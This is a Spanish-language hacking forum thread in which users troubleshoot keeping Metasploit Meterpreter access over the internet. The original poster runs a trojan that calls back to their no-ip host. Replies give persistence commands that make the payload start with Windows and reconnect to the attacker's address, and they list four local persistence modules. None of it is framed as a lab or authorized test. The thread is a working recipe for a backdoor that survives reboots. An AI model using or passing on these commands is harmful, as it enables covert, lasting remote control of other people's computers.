elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  metodos de persistencia metasploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: metodos de persistencia metasploit  (Leído 6,907 veces)
xeroAG

Desconectado Desconectado

Mensajes: 1


Ver Perfil
metodos de persistencia metasploit
« en: 18 Septiembre 2014, 19:38 pm »

hola ,tengo un problema a realizar persistencia en ataque wan

ejemplo yo configuro un troyano con mi direccion de no-ip hasta ahi todo me anda bien
lo segundo es establecer la conexion de handler ,estable perfecto.
se que no es el no-ip por que lo he usado cuando mi direccion cambia sin problemas

cuando tengo una sesion de meterpreter hago lo siguiente



run persistence -U -p 4444 -r midireccionde-no-ip.com  -i 10

pero si le doy quit al meterpreter y vuelvo a configurar la conexion de escucha si conecta estando activo el handler (no cerrando la terminal)
pero si cierro la terminal y de nuevo pongo msfconsole para arrancar metasploit y configuro la conexion de handler no conecta

pero en una red lan ssi me funciona cerrando la terminal.

no se cual se mi error tambien queria preguntar cuantos metodos de persistencia conocen para usar con metasploit.
En línea

silmido30

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: metodos de persistencia metasploit
« Respuesta #1 en: 23 Septiembre 2014, 23:57 pm »

hola aka te dejo los que utilizo y yo. aunque ultimamente he utilizado el persistence de armitage y funciona muy bien. trata de realizar las pruebas desde armitage y nos cuentas.

1)  run persistence -A -U -X -i -r (direccion no-ip) -p (puerto)

2)  run persistence -A -L C:\\ -X -i 10 -p (puerto) -r (direccion no-ip)

saludos...
En línea

GreenArrow77

Desconectado Desconectado

Mensajes: 13


https://www.youtube.com/watch?v=IlY9C6pzxKc


Ver Perfil WWW
Re: metodos de persistencia metasploit
« Respuesta #2 en: 27 Junio 2016, 13:06 pm »

hola xeroag

por lo que he visto, haces la persistencia desde la meterpreter (y según mi experiencia de metasploit) algunos comandos en la meterpreter dan lugar a fallos, como por ejemplo, siendo "nt system" (es decir, que has elevado privilegios y anteriormente has hecho el "getsysem"), al escribir el comando "hashdump" me ha arrojado errores, y es ilógico porque esta todo correcto, y eso me llevó a considerar varias alternativas, y acabé mandando la sesión a segundo plano (con "background") y use desde msf el comando "use post/windows/gather/hashdump" y efectivamente funcionó, ahora bien...por que te explico todo esto? porque quiero que veas que hay veces que la meterpreter falla, y nos volvemos locos buscando los errores. Por tanto, dos posibles soluciones con un mismo factor en común, ya citado antes (usar los modulos desde la msf):

* use exploit/windows/local/persistence
* use exploit/windows/local/registry_persistence
* use exploit/windows/local/vss_persistence
* use exploit/windows/local/s4u_persistence

Estos 4 son bastante efectivos, a mi personalmente me gusta (y me funciona) el 2º, ya que el problema que creo que puedes tener es que cuando ejecutas desde la meterpreter el script "run persistence..." (porque es un script), y pienso que puede tender a fallar, pues pienso que puede suceder es que el payload que mandas a anclarse al registro (por eso se llama persistencia, porque se inicia con el registro, eso hay que tenerlo en cuenta) no se engancha correctamente o simplemente no lo hace. Por tanto, con esto creo que la persistencia tendría un buen resultado, ves probando otros metodos y comprobando que se ancla en el registro, espero haberte ayudado,

Posdata: esto es un copia y pega de un mensaje anterior dirigido (por mi) hacia otro compañero que tenía un problema similar, te dejo el link por si quieres consultarlo:

https://foro.elhacker.net/hacking_basico/no_funciona_la_persistencia_en_metasploit_framework-t454127.0.html

un saludo! -by secu
En línea

~La única lucha que se pierde es la que se abandona.- E."Che" Guevara~
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
sobrecarga de metodos, se puede aplicar en metodos abstract o interfaces?
Desarrollo Web
jhonatanAsm 0 2,946 Último mensaje 16 Agosto 2011, 00:22 am
por jhonatanAsm
Seriealizacion y persistencia
Java
ivanrodas 2 2,122 Último mensaje 17 Mayo 2014, 15:26 pm
por ivanrodas
No funciona la persistencia en metasploit framework
Hacking
kilerpi 1 4,311 Último mensaje 27 Junio 2016, 13:02 pm
por GreenArrow77
Persistencia en metasploit
Hacking
AngelCaidoxX 0 2,598 Último mensaje 19 Diciembre 2017, 17:32 pm
por AngelCaidoxX
Métodos de persistencia
Análisis y Diseño de Malware
lBoreal 4 2,941 Último mensaje 7 Abril 2020, 05:09 am
por lBoreal
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines